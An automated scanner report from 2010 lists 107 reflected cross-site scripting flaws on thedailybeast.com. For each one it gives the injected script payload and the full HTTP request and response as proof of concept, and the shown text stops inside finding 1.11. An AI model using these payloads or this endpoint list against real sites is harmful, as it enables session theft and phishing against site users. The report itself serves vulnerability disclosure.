Report generated by XSS.CX at Sat Nov 13 20:05:53 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

1.1. http://www.thedailybeast.com/beast-board/ [REST URL parameter 1]

1.2. http://www.thedailybeast.com/beast_files/btn_submit.gif [REST URL parameter 1]

1.3. http://www.thedailybeast.com/beast_files/btn_submit.gif [REST URL parameter 2]

1.4. http://www.thedailybeast.com/beltway-beast/too-hot-for-huff-post/ [REST URL parameter 1]

1.5. http://www.thedailybeast.com/big-fat-story/ [REST URL parameter 1]

1.6. http://www.thedailybeast.com/blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ [REST URL parameter 1]

1.7. http://www.thedailybeast.com/blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ [REST URL parameter 2]

1.8. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ [REST URL parameter 1]

1.9. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ [REST URL parameter 2]

1.10. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ [REST URL parameter 1]

1.11. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ [REST URL parameter 2]

1.12. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ [REST URL parameter 1]

1.13. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ [REST URL parameter 2]

1.14. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ [REST URL parameter 1]

1.15. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ [REST URL parameter 2]

1.16. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ [REST URL parameter 1]

1.17. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ [REST URL parameter 2]

1.18. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/ [REST URL parameter 1]

1.19. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/ [REST URL parameter 2]

1.20. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/ [REST URL parameter 1]

1.21. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/ [REST URL parameter 2]

1.22. http://www.thedailybeast.com/cheat-sheet/ [REST URL parameter 1]

1.23. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 1]

1.24. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 2]

1.25. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 3]

1.26. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 4]

1.27. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 1]

1.28. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 2]

1.29. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 3]

1.30. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 4]

1.31. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 1]

1.32. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 2]

1.33. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 3]

1.34. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 4]

1.35. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 1]

1.36. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 2]

1.37. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 3]

1.38. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 4]

1.39. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 1]

1.40. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 2]

1.41. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 3]

1.42. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 1]

1.43. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 2]

1.44. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 3]

1.45. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 1]

1.46. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 2]

1.47. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 3]

1.48. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

1.49. http://www.thedailybeast.com/galleries/ [REST URL parameter 1]

1.50. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 1]

1.51. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 2]

1.52. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 4]

1.53. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 1]

1.54. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 2]

1.55. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 4]

1.56. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 1]

1.57. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 2]

1.58. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 4]

1.59. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 1]

1.60. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 2]

1.61. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 4]

1.62. http://www.thedailybeast.com/newsmaker/art-and-photography/ [REST URL parameter 1]

1.63. http://www.thedailybeast.com/newsmaker/book-beast/ [REST URL parameter 1]

1.64. http://www.thedailybeast.com/newsmaker/giving-beast/ [REST URL parameter 1]

1.65. http://www.thedailybeast.com/newsmaker/hungry-beast/ [REST URL parameter 1]

1.66. http://www.thedailybeast.com/newsmaker/innovation/ [REST URL parameter 1]

1.67. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/ [REST URL parameter 1]

1.68. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/ [REST URL parameter 3]

1.69. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/joel-makower34534/ [REST URL parameter 1]

1.70. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/joel-makower34534/ [REST URL parameter 3]

1.71. http://www.thedailybeast.com/newsmaker/new-york-fashion-week/ [REST URL parameter 1]

1.72. http://www.thedailybeast.com/newsmaker/politics/ [REST URL parameter 1]

1.73. http://www.thedailybeast.com/newsmaker/sexybeast/ [REST URL parameter 1]

1.74. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/ [REST URL parameter 1]

1.75. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/ [REST URL parameter 3]

1.76. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/ [REST URL parameter 1]

1.77. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/dita-von-teese346346/ [REST URL parameter 3]

1.78. http://www.thedailybeast.com/partnersfeed/ [REST URL parameter 1]

1.79. http://www.thedailybeast.com/search/ [REST URL parameter 1]

1.80. http://www.thedailybeast.com/sexybeast/ [REST URL parameter 1]

1.81. http://www.thedailybeast.com/tag/50+cent/ [REST URL parameter 1]

1.82. http://www.thedailybeast.com/tag/america’s%20next%20top%20model/ [REST URL parameter 1]

1.83. http://www.thedailybeast.com/tag/america’s%20next%20top%20model/ [REST URL parameter 1]

1.84. http://www.thedailybeast.com/tag/antoine+dodson/ [REST URL parameter 1]

1.85. http://www.thedailybeast.com/tag/arnold+schwarzenegger/ [REST URL parameter 1]

1.86. http://www.thedailybeast.com/tag/chilean+miner+edison+pena/ [REST URL parameter 1]

1.87. http://www.thedailybeast.com/tag/christine%20o’donnell/ [REST URL parameter 1]

1.88. http://www.thedailybeast.com/tag/conan%20o’brien/ [REST URL parameter 1]

1.89. http://www.thedailybeast.com/tag/conan%20o’brien/ [REST URL parameter 1]

1.90. http://www.thedailybeast.com/tag/entertainment/ [REST URL parameter 1]

1.91. http://www.thedailybeast.com/tag/george+w+bush/ [REST URL parameter 1]

1.92. http://www.thedailybeast.com/tag/glee/ [REST URL parameter 1]

1.93. http://www.thedailybeast.com/tag/gossip+girl/ [REST URL parameter 1]

1.94. http://www.thedailybeast.com/tag/gwyneth+paltrow/ [REST URL parameter 1]

1.95. http://www.thedailybeast.com/tag/jim+carrey/ [REST URL parameter 1]

1.96. http://www.thedailybeast.com/tag/jimmy+mcmillan/ [REST URL parameter 1]

1.97. http://www.thedailybeast.com/tag/jon+hamm/ [REST URL parameter 1]

1.98. http://www.thedailybeast.com/tag/judah+friedlander/ [REST URL parameter 1]

1.99. http://www.thedailybeast.com/tag/keith+olbermann/ [REST URL parameter 1]

1.100. http://www.thedailybeast.com/tag/michelle+obama/ [REST URL parameter 1]

1.101. http://www.thedailybeast.com/tag/ok+go/ [REST URL parameter 1]

1.102. http://www.thedailybeast.com/tag/simpsons/ [REST URL parameter 1]

1.103. http://www.thedailybeast.com/tag/tina+fey/ [REST URL parameter 1]

1.104. http://www.thedailybeast.com/tag/twilight/ [REST URL parameter 1]

1.105. http://www.thedailybeast.com/tag/wheel+of+fortune/ [REST URL parameter 1]

1.106. http://www.thedailybeast.com/tag/zach+galifianakis/ [REST URL parameter 1]

1.107. http://www.thedailybeast.com/video/ [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 107 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.thedailybeast.com/beast-board/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /beast-board/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87ead"><script>alert(1)</script>c4b7bcd53c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beast-board87ead"><script>alert(1)</script>c4b7bcd53c3/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/beast-board87ead"><script>alert(1)</script>c4b7bcd53c3/"/>
...[SNIP]...

1.2. http://www.thedailybeast.com/beast_files/btn_submit.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /beast_files/btn_submit.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef99f"><script>alert(1)</script>957dd7e6ea2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beast_filesef99f"><script>alert(1)</script>957dd7e6ea2/btn_submit.gif HTTP/1.1
Accept: */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:26 GMT
Connection: close
Content-Length: 58605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/beast_filesef99f"><script>alert(1)</script>957dd7e6ea2/btn_submit.gif"/>
...[SNIP]...

1.3. http://www.thedailybeast.com/beast_files/btn_submit.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /beast_files/btn_submit.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd23"><script>alert(1)</script>717e9f7ad6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beast_files/btn_submit.gifacd23"><script>alert(1)</script>717e9f7ad6f HTTP/1.1
Accept: */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:33 GMT
Connection: close
Content-Length: 58605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/beast_files/btn_submit.gifacd23"><script>alert(1)</script>717e9f7ad6f"/>
...[SNIP]...

1.4. http://www.thedailybeast.com/beltway-beast/too-hot-for-huff-post/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /beltway-beast/too-hot-for-huff-post/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29d3a"><script>alert(1)</script>e9205fb7368 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beltway-beast29d3a"><script>alert(1)</script>e9205fb7368/too-hot-for-huff-post/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 171923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/beltway-beast29d3a"><script>alert(1)</script>e9205fb7368/too-hot-for-huff-post/"/>
...[SNIP]...

1.5. http://www.thedailybeast.com/big-fat-story/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /big-fat-story/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd878"><script>alert(1)</script>17ff1b31cb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /big-fat-storydd878"><script>alert(1)</script>17ff1b31cb6/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/big-fat-storydd878"><script>alert(1)</script>17ff1b31cb6/"/>
...[SNIP]...

1.6. http://www.thedailybeast.com/blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52107"><script>alert(1)</script>1dc0689477b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories52107"><script>alert(1)</script>1dc0689477b/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories52107"><script>alert(1)</script>1dc0689477b/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/full/"/>
...[SNIP]...

1.7. http://www.thedailybeast.com/blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-08-16/unemployment-poll-should-the-government-do-more-about-jobs/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16a3d"><script>alert(1)</script>9ef41cfb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-08-1616a3d"><script>alert(1)</script>9ef41cfb5b/unemployment-poll-should-the-government-do-more-about-jobs/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-08-1616a3d"><script>alert(1)</script>9ef41cfb5b/unemployment-poll-should-the-government-do-more-about-jobs/full/"/>
...[SNIP]...

1.8. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5382"><script>alert(1)</script>c6680173ae5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-storiesb5382"><script>alert(1)</script>c6680173ae5/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:56:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-storiesb5382"><script>alert(1)</script>c6680173ae5/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/full/"/>
...[SNIP]...

1.9. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/10-media-controversies-of-2010-juan-williams-to-cathie-black/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad00"><script>alert(1)</script>505e5016574 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-12aad00"><script>alert(1)</script>505e5016574/10-media-controversies-of-2010-juan-williams-to-cathie-black/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-12aad00"><script>alert(1)</script>505e5016574/10-media-controversies-of-2010-juan-williams-to-cathie-black/full/"/>
...[SNIP]...

1.10. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886ba"><script>alert(1)</script>4ce8105120 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories886ba"><script>alert(1)</script>4ce8105120/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:57:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories886ba"><script>alert(1)</script>4ce8105120/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/full/"/>
...[SNIP]...

1.11. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/carnival-cruise-disaster-and-more-cruises-from-hell/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bcd7"><script>alert(1)</script>8ada850f6ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-128bcd7"><script>alert(1)</script>8ada850f6ff/carnival-cruise-disaster-and-more-cruises-from-hell/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
